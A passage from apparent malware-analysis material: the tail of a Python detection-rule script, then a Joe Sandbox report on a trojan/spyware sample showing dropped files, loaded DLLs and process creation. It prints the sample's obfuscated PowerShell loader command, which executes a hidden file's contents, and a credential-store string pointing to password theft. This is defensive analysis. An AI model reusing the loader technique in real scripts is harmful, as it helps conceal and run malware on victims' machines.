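    {"EventID": 11, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\notes.txt", "Header": b"hell"},
]

if __name__ == "__main__":
    for rule, image, target in correlate(SAMPLE_EVENTS):
        print(rule, image, target, sep="  ")
```

The svchost.exe FontCache write in the report is ordinary service activity and is left alone because the writer lives under C:\Windows; the third rule will still fire on legitimate installers run from a user profile, so scope it with signer or parent-process data before alerting on it alone.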
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_00406BFE 0_2_00406BFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0722DF38 1_2_0722DF38
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00406BFE 11_2_00406BFE
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015C19B 11_2_0015C19B
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015D278 11_2_0015D278
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00155370 11_2_00155370
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015C468 11_2_0015C468
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015C738 11_2_0015C738
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015E988 11_2_0015E988
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_001569A0 11_2_001569A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_001529E0 11_2_001529E0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015CA08 11_2_0015CA08
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015CCD8 11_2_0015CCD8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00159DE0 11_2_00159DE0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00153E09 11_2_00153E09
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015CFAC 11_2_0015CFAC
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00156FC8 11_2_00156FC8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015F974 11_2_0015F974
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015E97C 11_2_0015E97C
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22412A90 11_2_22412A90
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241E7D0 11_2_2241E7D0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22411FA8 11_2_22411FA8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22419448 11_2_22419448
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22411850 11_2_22411850
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22415148 11_2_22415148
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22419D38 11_2_22419D38
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241D660 11_2_2241D660
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22419668 11_2_22419668
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241D670 11_2_2241D670
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241D209 11_2_2241D209
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241D218 11_2_2241D218
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241DAC8 11_2_2241DAC8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22412A80 11_2_22412A80
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241DAB9 11_2_2241DAB9
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241E36A 11_2_2241E36A
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241E377 11_2_2241E377
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241E378 11_2_2241E378
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241DF11 11_2_2241DF11
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241DF20 11_2_2241DF20
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22410B20 11_2_22410B20
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22410B30 11_2_22410B30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241E7C0 11_2_2241E7C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241E7CF 11_2_2241E7CF
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22411F9C 11_2_22411F9C
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22411841 11_2_22411841
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22410040 11_2_22410040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241F071 11_2_2241F071
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22410012 11_2_22410012
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241EC18 11_2_2241EC18
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241EC28 11_2_2241EC28
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22418CC0 11_2_22418CC0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241F4C8 11_2_2241F4C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241F4D8 11_2_2241F4D8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241F080 11_2_2241F080
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22418CB1 11_2_22418CB1
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241F922 11_2_2241F922
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241F930 11_2_2241F930
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_22415138 11_2_22415138
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241CDC0 11_2_2241CDC0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2241CDAF 11_2_2241CDAF
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23417B78 11_2_23417B78
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234181D0 11_2_234181D0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23418FB0 11_2_23418FB0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341DC30 11_2_2341DC30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23414ED0 11_2_23414ED0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341E540 11_2_2341E540
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23412749 11_2_23412749
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23410D48 11_2_23410D48
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341C54F 11_2_2341C54F
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341E550 11_2_2341E550
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23412758 11_2_23412758
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341A55F 11_2_2341A55F
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341C560 11_2_2341C560
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23417B69 11_2_23417B69
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341A570 11_2_2341A570
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23415770 11_2_23415770
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23412300 11_2_23412300
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341F300 11_2_2341F300
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341D300 11_2_2341D300
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341D310 11_2_2341D310
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341B310 11_2_2341B310
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23417720 11_2_23417720
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341B320 11_2_2341B320
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23417722 11_2_23417722
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23415328 11_2_23415328
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234197C0 11_2_234197C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341E9D0 11_2_2341E9D0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23415BD8 11_2_23415BD8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341E9E0 11_2_2341E9E0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341C9E0 11_2_2341C9E0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234115E8 11_2_234115E8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341C9F0 11_2_2341C9F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341A9F0 11_2_2341A9F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23412FF9 11_2_23412FF9
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234115F8 11_2_234115F8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341F781 11_2_2341F781
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23415780 11_2_23415780
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341D791 11_2_2341D791
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341F790 11_2_2341F790
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341119F 11_2_2341119F
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23418FA1 11_2_23418FA1
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341D7A0 11_2_2341D7A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234111A0 11_2_234111A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23412BA0 11_2_23412BA0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341B7A0 11_2_2341B7A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_2341B7B0 11_2_2341B7B0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23412BB0 11_2_23412BB0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234197B0 11_2_234197B0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23411A41 11_2_23411A41
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll 1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
Source: NDQ211216GM08.exe.bin.exe, 00000000.00000000.998476324.0000000000454000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameisogamies.exeDVarFileInfo$ vs NDQ211216GM08.exe.bin.exe
Source: NDQ211216GM08.exe.bin.exe Binary or memory string: OriginalFilenameisogamies.exeDVarFileInfo$ vs NDQ211216GM08.exe.bin.exe
Source: NDQ211216GM08.exe.bin.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/21@5/6
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004034F7
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 11_2_004034F7
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_00404AE1 GetDiskFreeSpaceW,MulDiv, 0_2_00404AE1
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_00402210 CoCreateInstance, 0_2_00402210
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe File created: C:\Users\user\AppData\Local\Skakspillene144
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe File created: C:\Users\user\AppData\Local\Temp\nsd2A3.tmp
Source: NDQ211216GM08.exe.bin.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000204F7000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204A8000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204B8000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204C6000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000204EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: NDQ211216GM08.exe.bin.exe Virustotal: Detection: 63%
Source: NDQ211216GM08.exe.bin.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe File read: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe
Source: unknown Process created: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe "C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe"
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Nonalined.exe "C:\Users\user\AppData\Local\Temp\Nonalined.exe"
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Nonalined.exe "C:\Users\user\AppData\Local\Temp\Nonalined.exe"
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
